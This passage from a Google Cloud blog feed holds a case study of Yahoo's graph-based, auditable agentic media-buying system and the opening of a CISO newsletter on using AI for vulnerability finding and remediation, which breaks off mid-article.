&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"Yahoo's mission is to be a trusted guide through the digital world. In partnership with Google Cloud, we're extending that promise to advertisers: agentic media buying that's fast, transparent, effective, and built to be trusted." &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;- Gabriel DeWitt, Head of Monetization, Yahoo&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we explore the shift toward agentic AI, examine how Yahoo’s Seller Agent architecture solves for speed and trust in media buying, and show you how to apply this graph-based pattern to build trusted systems of action in your own organization.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Case study: agentic media buying&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For years, complex, high-value workflows—like premium digital advertising campaigns—have required weeks of human handoffs, fragmented spreadsheets, and manual analysis. Yahoo recognized that agentic AI could collapse this timeline, allowing agents to plan and execute campaigns in mere seconds. This leap from manual to autonomous execution represents a massive opportunity to reclaim operational efficiency and ensure more of every dollar reaches measurable outcomes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But simply dropping LLMs into a high-stakes workflow does not solve the problem; an agent attempting to negotiate contracts or ad placements without a deterministic understanding of real-time inventory, pricing rules, and business constraints is prone to hallucinate — potentially resulting in disastrous deals. A trusted agentic platform requires a definitive, real-time source of truth, ensuring it acts on hard facts rather than statistical guesses.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Furthermore, speed and factual grounding are only half the equation. The moment an AI agent starts moving real budgets, it faces scrutiny from regulators who demand instant answers to why specific decisions were made or which policies were applied. Digging through raw system logs after the fact is the wrong control surface for autonomous execution. Real-world systems of action require regulator-grade governance and auditability built directly into the workflow, not bolted on as an afterthought.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The architecture of a trusted system of action&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Yahoo's mission has always been to be a trusted guide through the digital world. Agentic media buying extends that promise to advertisers, agencies, publishers, and regulators who entrust Yahoo with their budgets — and expect real accountability. The issue was automating campaign execution in a way that was explainable, governable, and auditable.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To meet this challenge, Yahoo built its Seller Agent as a multi-agent system running on Google Cloud. Buyer requests enter through a planning supervisor agent running on &lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Kubernetes Engine&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (GKE) and orchestrated with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/build/adk"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google's Agent Development Kit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (ADK). The supervisor decomposes each request into specialized tasks including inventory discovery, audience matching, forecasting, pricing analysis, package recommendation, governance review, and execution. Agents coordinate through the open &lt;/span&gt;&lt;a href="https://github.com/a2aproject/A2A" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent2Agent&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (A2A) protocol, while &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; hosts models for embeddings, forecasting, and graph learnings.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But the true breakthrough — what makes autonomous execution both fast and fully transparent — is the platform’s dual-graph foundation. The platform is anchored by two specialized graph systems with an intentional separation of duties: a knowledge graph that’s optimized for acting, and a second context graph for remembering and learning.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="[0] trusted_system_of_action" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/0_trusted_system_of_action.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;The knowledge graph: Grounding agents in business reality&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Powered by &lt;/span&gt;&lt;a href="https://cloud.google.com/products/spanner/graph?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner Graph&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Yahoo’s knowledge graph represents its monetization business as a connected operational model, grounding every agent decision in business reality. It models advertising products, placements, audience segments, inventory, contracts, and governance controls as first-class entities and relationships. Crucially, policies live directly within the graph as versioned relationships rather than being buried in application logic. This design allows the system to evaluate products, contractual obligations, consent requirements, and regulatory constraints together in a single, unified graph traversal.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The graph acts as a semantic contract across the agentic platform. During campaign evaluation, an agent can navigate from initial buyer requirements to eligible audiences and governing policies within a single query plan. &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; embeddings enrich these entities with semantic similarity, while graph neural networks contribute inferred relationships. Ultimately, this allows agents to do more than just retrieve available inventory — they understand exactly why it is relevant and help ensure it satisfies all governing constraints.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="[1] knowledge_graph_ontology" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_knowledge_graph_ontology.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Yahoo’s knowledge graph ontology, aligned with industry standards like &lt;a href="https://iabtechlab.com/standards/adcom-advertising-common-object-model/"&gt;IAB AdCOM&lt;/a&gt;&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;The context graph: creating an auditable memory&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Execution at agent-scale is only safe if it is entirely transparent — which is the core function of the context graph. Every time the Seller Agent takes an action, that exact operational span is captured by the &lt;/span&gt;&lt;a href="https://adk.dev/integrations/bigquery-agent-analytics/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Agent Analytics plugin&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. In addition to logging the raw events, the system shapes this evidence into a typed, queryable context graph using &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/BigQuery-Agent-Analytics-SDK" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Agent Analytics SDK&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; utilizing Yahoo's decision-trace ontology, stored in &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/graph-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Graph&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Consequently, every decision point, candidate package, policy evaluation, specialist-agent delegation, and execution outcome becomes a connected graph of evidence. Because this trace is structured as a typed graph, explaining the agent’s decision making process becomes a simple query. An auditor can instantly trace a decision from the originating campaign brief through every score that’s assigned and policy that’s applied. This transforms autonomous behavior from an opaque process into a fully transparent and continuously improving record of decision-making, helping to ensure absolute accountability.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="[2] context_graph_ontology" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_context_graph_ontology.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Yahoo’s context graph ontology&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;From human to agent scale&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For a concrete example of the architecture in action, consider an ad campaign run. What traditionally required weeks of coordination across planning, sales, operations, and compliance can now be completed in seconds through two simultaneous processes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Acting via the knowledge graph. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This pipeline moves the budget, navigating linearly from the buyer's request to a live campaign ground on the knowledge graph. This proceeds in four steps:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Submitting the brief:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A buyer agent submits a campaign brief over Ad Context Protocol (AdCP) that describes the desired audience, budget, geography, and business objective.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Knowledge retrieval:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Seller Agent queries the knowledge graph to identify relevant inventory, audiences, contractual availability, historical performance, and governing policies.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Evaluation and scoring:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The agent evaluates these factors together to assemble a package of media buying candidates. Forecasting models score the opportunities, while a governance agent independently reviews consent, brand safety, and regulatory constraints.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Approval and execution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The package is either approved automatically under policy thresholds or escalated for human review. Once approved, the media buy is executed and activated.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Auditing and learning via the context graph.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; While the execution pipeline moves forward, this parallel loop continuously captures the system's reasoning in the context graph, helping to ensure transparency and improve future cycles. This offers the following capabilities:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Continuous capture&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Every candidate considered, score assigned, policy applied, and governance decision becomes a connected record in the context graph, linked to the originating campaign session.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Closed-loop learning&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: As delivery, attribution, and outcome signals arrive, they are joined back to the decisions that produced them, creating the training data that improves future recommendations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Instant explainability&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: If an advertiser asks why a particular package was selected or which policies influenced the outcome, the answer is preserved in the context graph and reachable through a single query.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The result is a platform where knowledge, decision-making, governance, measurement, and learning operate together — allowing autonomous media buying to remain explainable, auditable, and continuously improving.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;A blueprint for many industries&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The era of AI as a mere advisor is ending. Enterprises are demanding systems of action — autonomous agents capable of executing complex, multi-step workflows. But in regulated sectors, the speed that AI brings to the table turns into a liability if you cannot prove how a decision was made. The primary barrier to autonomous execution is no longer intelligence; it is trust.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The architecture that Yahoo and Google Cloud built provides a broadly applicable blueprint with which to solve this. While designed to fix the bottlenecks of digital media buying, the underlying pattern applies to any industry managing high-stakes decisions — from financial trading to supply chain logistics. To operate at agent speed but still maintain human oversight, enterprises must adopt a new architectural baseline that:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Grounds decisions in business reality:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Agents cannot rely on probabilistic models alone. They must be grounded by a knowledge graph that deterministically maps your business logic, active contracts, and compliance rules.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Builds an auditable memory:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You cannot govern what you cannot trace. Every agentic action must be captured in a context graph, creating an immutable, queryable record of exactly why a decision was made and which alternatives were rejected.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Embraces open interoperability:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Trust requires transparency. By building on open protocols and provenance standards, industries can establish a common, auditable language for agentic behavior.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As foundational models become commoditized, enterprises’ competitive advantages are shifting. Long term, your moat will not be the language model you deploy, but the proprietary graph of your business operations and governed history.  Likewise, the future of enterprise AI isn’t simply systems that can act, but systems that can explain, govern, and take accountability for those actions.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to build your own trusted system of action? Start by exploring &lt;/span&gt;&lt;a href="https://cloud.google.com/products/spanner/graph?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner Graph&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to ground your agentic workflows in business reality. Next, use &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/graph-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Graph&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to build an auditable memory that powers closed-loop learning and regulator-grade explainability. You can begin capturing and analyzing these operational traces today using the &lt;/span&gt;&lt;a href="https://adk.dev/integrations/bigquery-agent-analytics/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Agent Analytics Plugin&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/BigQuery-Agent-Analytics-SDK" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SDK&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Finally, review the &lt;/span&gt;&lt;a href="https://adcontextprotocol.org/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Ad Context Protocol&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to understand the open communication standards underpinning Yahoo’s agentic platform.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/databases/graph-technologies-underpin-yahoo-system-of-action/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-15T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-the-4-lessons-that-guided-ai-threat-defense/</id>
    <title>Cloud CISO Perspectives: The 4 lessons that guided AI Threat Defense</title>
    <updated>2026-06-15T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;Welcome to the first Cloud CISO Perspectives for June 2026. Today, we introduce Chris Betz as the new CISO of Google Cloud. For his first Cloud CISO Perspectives, Chris shares four key lessons we learned about using AI to the defender’s advantage while building AI Threat Defense.&lt;/p&gt;&lt;p&gt;As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the &lt;a href="https://cloud.google.com/blog/products/identity-security/"&gt;Google Cloud blog&lt;/a&gt;. If you’re reading this on the website and you’d like to receive the email version, you can &lt;a href="https://cloud.google.com/resources/google-cloud-ciso-newsletter-signup"&gt;subscribe here&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Get vital board insights with Google Cloud&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0bfc60aca0&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Visit the hub&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;https://cloud.google.com/solutions/security/board-of-directors?utm_source=cgc-site&amp;amp;utm_medium=et&amp;amp;utm_campaign=FY26-Q2-GLOBAL-GCP39634-email-dl-dgcsm-CISOP-NL-177159&amp;amp;utm_content=-&amp;amp;utm_term=-&amp;#x27;), (&amp;#x27;image&amp;#x27;, &amp;lt;GAEImage: GCAT-replacement-logo-A&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;Cloud CISO Perspectives: The 4 lessons that guided AI Threat Defense&lt;/h3&gt;&lt;p&gt;&lt;i&gt;By Chris Betz, CISO, Google Cloud&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="Chris Betz" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Chris_Betz.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Chris Betz, CISO, Google Cloud&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;Just a year ago, it would take months or even years for a good application security team to find thousands of vulnerabilities. Today, a team equipped with multiple AI models can find the same number in hours — or even minutes.&lt;/p&gt;&lt;p&gt;AI is rewriting the rules of cybersecurity. It’s true that AI has boosted adversaries, introducing new threat actors, techniques, and surfaces to defend against, all operating with unprecedented scale, speed, and sophistication. AI-powered attackers are developing zero-day exploits by analyzing more than just source code: Configuration vulnerabilities, binaries, and firmware are all in their crosshairs.&lt;/p&gt;&lt;p&gt;However, AI has also created a significant advantage for defenders. Not only are these same capabilities in our hands, adding to our defense, but we have the added advantage of the full business context that adversaries lack. Software security, and especially vulnerability finding and fixing, is being revolutionized.&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-pull_quote"&gt;&lt;div class="uni-pull-quote h-c-page"&gt;
  &lt;section class="h-c-grid"&gt;
    &lt;div class="uni-pull-quote__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;
      &lt;div class="uni-pull-quote__inner-wrapper h-c-copy h-c-copy"&gt;
        &lt;q class="uni-pull-quote__text"&gt;Security is changing rapidly, demanding that we all innovate in response. Here is how we are approaching this work today, and some of the lessons we learned along the way.&lt;/q&gt;

        
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/section&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It’s clear that the AI benefits for security are rapidly evolving, and we can no longer rely on legacy, manual defenses. The new imperative for CISOs and business leaders is to transform vulnerability management by combating machine-speed threats with a defensive strategy that’s AI native, agentic, and open. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve been preparing for this moment for years: From &lt;/span&gt;&lt;a href="https://projectzero.google/2024/06/project-naptime.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Project Naptime&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, an internal project to automate vulnerability hunting (so security researchers can take regular naps), to &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-our-big-sleep-agent-makes-big-leap"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Big Sleep&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, our autonomous zero-day hunter, to &lt;/span&gt;&lt;a href="https://deepmind.google/discover/blog/introducing-codemender-an-ai-agent-for-code-security/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CodeMender&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, our automated AI-patching agent, we’ve innovated to advance using AI to improve security for all. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Across our products and services, we’ve found that a unified approach &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/how-google-does-it-security-series/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;helps us protect Google at Google scale&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Based on this approach, we recently &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-ai-threat-defense"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;introduced AI Threat Defense&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; as a pathway to achieve the threat-readiness transformation that you need to defend against AI threats with AI. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The framework is straightforward, and you’ll find that it’s ultimately about two key points:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Using rapidly-advancing AI to protect ourselves.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Shifting the way we develop from the ground up. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security is changing rapidly, demanding that we all innovate in response. Here is how we are approaching this work today, and some of the lessons we learned along the way. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Four key lessons&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our work is built on a four-step framework, structured directly on what we learned:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prepare&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: How Google started the journey — hardening our foundation and operationalizing the framework.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Scan and prioritize&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: How we identified vulnerabilities — conduct deep-dive analysis and posture validation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Remediate&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: What we learned from remediation — implement workflows to autonomously verify and patch vulnerabilities quickly.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Monitor&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: How we evolved monitoring with AI agents — transition to continuous detection and active response playbooks.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Prepare&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: A modern enterprise runs on an enormous amount of software, and at Google that amount is even greater. We needed focus in order to move at speed, so our first lesson was to reduce our attack surface. That let us narrow our focus, reduce complexity, and use insights we have on our software supply chain and dependencies to prioritize and protect our external interfaces. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Second, we invested in the operational framework supporting the vulnerability work. Early experimentation quickly showed us how valuable a scaling framework is that applies our knowledge of the environment, protects and allocates resources for scanning, and allows new capabilities to be iterated on and used by multiple teams. The amplifying power of good information, code access, dependency graphs, token budgets, and infrastructure are key friction reducers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Third, we planned engineering work alongside security work: Your engineering partners are critical, especially for aligning with your resiliency and deployment processes.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Key lessons include: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Tagging components with the model, harness, and issues found when scanning.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Allocating hardware and token budgets for finding, developing fixes, build and test.  &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Managing change volume (and engineer hours) while simultaneously focusing on more, smaller updates, where possible, with good rollout plans to de-risk the change.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Scan and prioritize&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: We continuously scan our code across products — Search, Ads, Android, Chrome, and Google Cloud — managing tens of thousands of packages.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;First, we kicked off scanning and centrally tracked our progress, integrating the same tools into our pipelines. We learned early on that the best scanning results come from a combination of an expert in the specific product plus the harness plus the AI model. The combination is crucial, because results will be markedly different without all three.&lt;/span&gt;&lt;/p&gt;
